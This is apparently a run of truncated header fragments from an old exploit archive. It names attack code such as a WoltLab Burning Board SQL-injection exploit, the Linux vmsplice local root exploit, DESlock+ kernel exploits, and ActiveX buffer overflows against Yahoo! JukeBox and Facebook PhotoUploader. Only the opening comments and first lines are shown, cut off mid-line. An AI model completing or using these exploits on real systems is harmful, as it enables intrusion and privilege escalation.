?php /** * Original : http://sektioneins.de/advisories/SE-2008-01.txt * Thanks to Stefan Esser, here's the exploit. * * Team : EpiBite * firefox, petit-poney, thot * Nous tenons a remercier nos mamans et papas respectifs. * Let's get a fu*** coffee !
?php ini_set(max_execution_time,0); echo WoltLab Burning Board 3.0.X Remote SQL-Injection Exploit by NBBNn; start(1, 48); /** You have to edit this script. **/ /** Works succesfully at 3.0.1. If you enter in 3.0.3 PL1: index.php?page=PMListfolderID=
/* * jessica_biel_naked_in_my_bed.c * * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura. * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca. * Stejnak je to stare jak cyp a aj jakesyk rozbite. * * Linux vmsplice Local Root Exploit * B
#!/usr/bin/perl # crash the iPhoto DPAP (Digital Photo Access Protocol) Server on iPhoto 4.0.3 # technically the server exits cleanly but it does not restart use IO::Socket::INET; die Usage $0 target_ipn unless ($ARGV[0]); $| = 1; if ($ARGV[1]) { $p
#!/usr/bin/ruby #inphex - i didnt include all of those bugs into the code,this code basicly checks if the forum is vulnerable and also exploits SQL Injection bug! #all versions on sourceforge seem to be the same ; so check is beeing done on each ver
/* deslock-pown-v2.c * * Copyright (c) 2008 by mu-b@digit-labs.org * * DESlock+ = 3.2.6 local kernel ring0 SYSTEM exploit * by mu-b - Wed 26 Dec 2007 * * - Tested on: DLMFDISK.sys 1.2.0.27 * - Microsoft Windows 2003 SP2 * - Microsoft Windows XP SP2 *
/* deslock-list-zero-v2.c * * Copyright (c) 2008 by mu-b@digit-labs.org * * DESlock+ = 3.2.6 local kernel ring0 link list zero SYSTEM exploit * by mu-b - Fri 28 Dec 2007 * * - Tested on: DLMFENC.sys 1.0.0.26, DLMFDISK.sys 1.2.0.27 * - Microsoft Windo
/* * Copyright (c) 2008 chujwamwdupe - pumpernikiel.c * * one day in teletubby land... * * an email from idefense: * * Unfortunately, Microsoft has refused to credit you using the name you requested. * * ...what's wrong with 'chujwamwdupe', eh? * *
!-- Yahoo! JukeBox MediaGrid ActiveX Control mediagrid.dll AddBitmap() Buffer Overflow Exploit written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, mediagrid.dll version 2.2.2.56 Thanks to h.d.m. and the Metasploit crew -- html head
!-- Yahoo! JukeBox datagrid.dll AddButton() Buffer Overflow Exploit written by e.b. Vulnerability discovered by Krystian Kloskowski (h07@interia.pl) Inspired by http://milw0rm.com/exploits/5046 Tested on Windows XP SP2(fully patched) English, IE6, da
!-- FaceBook PhotoUploader Buffer Overflow Exploit written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, ImageUploader4.ocx 4.5.57.0(FaceBookPhotoUploader2.cab) The following controls are also vulnerable: Aurigma ImageUploader4 4.5.70
!-- Yahoo! Music Jukebox 2.2 AddImage() ActiveX BOF Discovered by Krystian Kloskowski - h07@interia.pl Written by exceed (code ripped from here and there...) Tested on Windows XP SP3 English / IE6 SP3 / datagrid.dll v2.2.2.56 -- html object classid=c